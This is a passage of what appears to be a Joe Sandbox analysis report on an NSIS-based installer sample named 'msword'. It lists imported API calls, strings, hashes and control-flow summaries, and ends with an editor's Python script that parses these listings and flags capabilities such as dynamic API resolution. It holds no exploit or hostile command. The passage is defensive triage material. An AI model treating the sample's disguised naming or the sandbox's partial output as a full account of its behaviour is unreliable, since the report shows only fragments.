4202->4203 4208 402708 4203->4208 4213 406805 18 API calls 4203->4213 4205->4208 4209 402387 GlobalFree 4205->4209 4206->4211 4217 406009 lstrcpynW 4207->4217 4209->4208 4219 406009 lstrcpynW 4211->4219 4212 401f06 4218 406009 lstrcpynW 4212->4218 4213->4203 4215 401f15 4220 406009 lstrcpynW 4215->4220 4217->4212 4218->4215 4219->4205 4220->4208 5201 4074bb 5203 407344 
5201->5203 5202 407c6d 5203->5202 5204 4073c2 GlobalFree 5203->5204 5205 4073cb GlobalAlloc 5203->5205 5206 407443 GlobalAlloc 5203->5206 5207 40743a GlobalFree 5203->5207 5204->5205 5205->5202 5205->5203 5206->5202 5206->5203 5207->5206

Control-flow Graph
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                        • GetClientRect.USER32(?,?), ref: 00405196
                                                                                        • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                        • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                          • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                        • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                        • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                        • ShowWindow.USER32(00000008), ref: 00405333
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                        • CreatePopupMenu.USER32 ref: 00405376
                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                        • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                        • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                        • EmptyClipboard.USER32 ref: 00405411
                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                        • CloseClipboard.USER32 ref: 0040546E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                        • String ID: @rD$New install of "%s" to "%s"${
                                                                                        • API String ID: 2110491804-2409696222
                                                                                        • Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                        • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                        • Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                        • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59


                                                                                        Control-flow Graph (function 00403883; legend: Executed / Not Executed; rendered graph not reproduced, the APIs called from its blocks are listed below)
                                                                                        APIs
                                                                                        • #17.COMCTL32 ref: 004038A2
                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                        • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                        • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                        • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                        • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                        • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                        • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                        • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                        • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                        • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                        • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                        • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                        • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                        • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                        • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                        • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                        • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                        • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                        • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                        • API String ID: 2435955865-239407132
                                                                                        • Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                        • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                        • Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                        • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E


                                                                                        Control-flow Graph (function 00406805; legend: Executed / Not Executed; rendered graph not reproduced, the APIs called from its blocks are listed below)
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                        • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                        • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                        • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                        • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                        • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                        • API String ID: 3581403547-784952888
                                                                                        • Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                        • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                        • Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                        • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D


                                                                                        Control-flow Graph (function 004074BB; legend: Executed / Not Executed; rendered graph not reproduced; its blocks call GlobalAlloc and GlobalFree)
                                                                                        Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                        • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                        • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                        • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406327
Memory Dump Source: same dump and associated regions as listed above (00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true)
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                        • String ID:
                                                                                        • API String ID: 310444273-0
                                                                                        • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                        • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                        • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                        • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                        • FindClose.KERNEL32(00000000), ref: 004062EC
Memory Dump Source: same dump and associated regions as listed above (00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true)
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                        • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                        • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                        • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Control-flow Graph (rendered figure; the executed/not-executed colouring of blocks is not recoverable from the text and the edge list is omitted): basic blocks 56-158 covering 405479-405929; API calls inside the graph: SetWindowPos, ShowWindow, DestroyWindow, SetWindowLongW, GetDlgItem, SendMessageW, IsWindowEnabled, KiUserCallbackDispatcher, EnableWindow, GetSystemMenu, EnableMenuItem, lstrlenW, SetWindowTextW, CreateDialogParamW, GetWindowRect, ScreenToClient.
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                        • ShowWindow.USER32(?), ref: 004054D2
                                                                                        • DestroyWindow.USER32 ref: 004054E6
                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                        • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00405611
                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                        • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                        • EnableWindow.USER32(?,?), ref: 00405757
                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                        • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                        • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                        • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00405910
Memory Dump Source: same dump and associated regions as listed above (00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true)
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                                                        • String ID: @rD
                                                                                        • API String ID: 3906175533-3814967855
                                                                                        • Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                        • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                        • Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                        • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Control-flow Graph (rendered figure; the executed/not-executed colouring of blocks is not recoverable from the text and the edge list is omitted): basic blocks 159-298 covering 4015a0-4030f2; API calls inside the graph: PostQuitMessage, Sleep, SetForegroundWindow, ShowWindow, SetFileAttributesW, CreateDirectoryW, GetLastError, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW.
                                                                                        APIs
                                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                        Strings
                                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                        • BringToFront, xrefs: 004016BD
                                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                                        • Call: %d, xrefs: 0040165A
                                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                        • Rename: %s, xrefs: 004018F8
                                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                        • Sleep(%d), xrefs: 0040169D
                                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                                        • Jump: %d, xrefs: 00401602
                                                                                        • detailprint: %s, xrefs: 00401679
                                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                        • Rename on reboot: %s, xrefs: 00401943
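The three listings above (the import resolver at 0040630A, the file-system instruction handler at 004015A0 and its string references) are the parts of a report like this that get copied into triage notes. What follows is an added example, not Joe Sandbox code and not part of the report: it parses lines in exactly the `• Name.MODULE(args), ref: addr` and `• text, xrefs: addr` shapes used on this page (the sample input is copied from the listings above), derives capability flags from the API names, and pairs each call site with the nearest string reference by address. The capability rules are the editor's own approximation of what signatures such as "Contains functionality to dynamically determine API calls" look for, not the sandbox's logic, and nearest-by-address is a hint about the surrounding log message, not a data-flow proof. One further observation that is the editor's and not the report's: the format strings above (IfFileExists, detailprint, Rename on reboot, "CreateDirectory: can't create "%s" (err=%d)") are the log messages of the NSIS installer engine's instruction interpreter.

```python
"""Parse Joe Sandbox per-function "APIs" and "Strings" listings, flag coarse
capabilities from API names, and pair call sites with nearby string refs.
Added example for this report page; not Joe Sandbox code."""
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed sample: lines copied from the "APIs" listing of the import
# resolver at 0x40630A and the "APIs"/"Strings" listings of the handler
# at 0x4015A0 in this report.
SAMPLE_APIS_RESOLVER = """
• GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
• LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
• GetProcAddress.KERNEL32(00000000), ref: 00406327
"""
SAMPLE_APIS_HANDLER = """
• CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
• GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
• GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
• MoveFileW.KERNEL32(00000000,?), ref: 00401908
"""
SAMPLE_STRINGS_HANDLER = """
• CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
• CreateDirectory: "%s" (%d), xrefs: 004017BF
• Rename failed: %s, xrefs: 0040194B
• Rename: %s, xrefs: 004018F8
• Rename on reboot: %s, xrefs: 00401943
"""

# "• Name.MODULE(arg,...), ref: 0040630A"; the argument list is optional
# (the report prints "• DestroyWindow.USER32 ref: 004054E6" for a bare call).
API_LINE = re.compile(
    r"^•\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)
# "• text, xrefs: 004018C6"; the text may itself contain commas, so the
# greedy group is terminated by the final ", xrefs:".
STRING_LINE = re.compile(r"^•\s*(?P<text>.*), xrefs:\s*(?P<ref>[0-9A-Fa-f]{8})$")


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple   # raw argument tokens as printed, "?" for unknown
    ref: int      # call-site address


@dataclass(frozen=True)
class StringRef:
    text: str
    ref: int      # address of the instruction referencing the string


def parse_apis(listing: str) -> List[ApiCall]:
    calls = []
    for raw in listing.splitlines():
        m = API_LINE.match(raw.strip())
        if not m:
            continue  # blank lines and section headings
        args = tuple(a for a in (m.group("args") or "").split(",") if a)
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16)))
    return calls


def parse_strings(listing: str) -> List[StringRef]:
    return [StringRef(m.group("text"), int(m.group("ref"), 16))
            for m in (STRING_LINE.match(raw.strip()) for raw in listing.splitlines())
            if m]


# Each rule: (names that must all be present, names of which at least one
# must be present). Editor's heuristic, not the sandbox's signature logic.
CAPABILITY_RULES = {
    # GetModuleHandle/LoadLibrary feeding GetProcAddress: imports resolved at
    # run time, the pattern behind "dynamically determine API calls".
    "dynamic_api_resolution": ({"GetProcAddress"},
                               {"LoadLibraryA", "LoadLibraryW",
                                "GetModuleHandleA", "GetModuleHandleW"}),
    "filesystem_modification": (set(), {"CreateDirectoryW", "MoveFileW",
                                        "SetFileAttributesW", "SetCurrentDirectoryW"}),
    "directory_enumeration": (set(), {"FindFirstFileW", "FindNextFileW"}),
}


def capabilities(calls: List[ApiCall]) -> Set[str]:
    names = {c.name for c in calls}
    return {cap for cap, (need_all, need_any) in CAPABILITY_RULES.items()
            if need_all <= names and (not need_any or names & need_any)}


def nearest_string(call: ApiCall, strings: List[StringRef]) -> Optional[StringRef]:
    """String reference closest by address to the call site: a hint of the
    log message the surrounding code emits, not proof of a data flow."""
    if not strings:
        return None
    return min(strings, key=lambda s: abs(s.ref - call.ref))


def annotate(calls: List[ApiCall], strings: List[StringRef]) -> List[tuple]:
    return [(c.name, f"{c.ref:08X}",
             (nearest_string(c, strings) or StringRef("", 0)).text) for c in calls]


if __name__ == "__main__":
    print("resolver:", sorted(capabilities(parse_apis(SAMPLE_APIS_RESOLVER))))
    handler = parse_apis(SAMPLE_APIS_HANDLER)
    print("handler:", sorted(capabilities(handler)))
    for row in annotate(handler, parse_strings(SAMPLE_STRINGS_HANDLER)):
        print(row)
```

Run as a script it prints the flags for both functions and, for the handler, each call site next to the closest log format string (GetLastError at 0040180B lands beside "CreateDirectory: can't create "%s" (err=%d)"). The rule table is the place to encode whatever the local triage playbook treats as notable; the parser is deliberately strict about the line shape so a changed report layout fails loudly rather than silently dropping calls.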
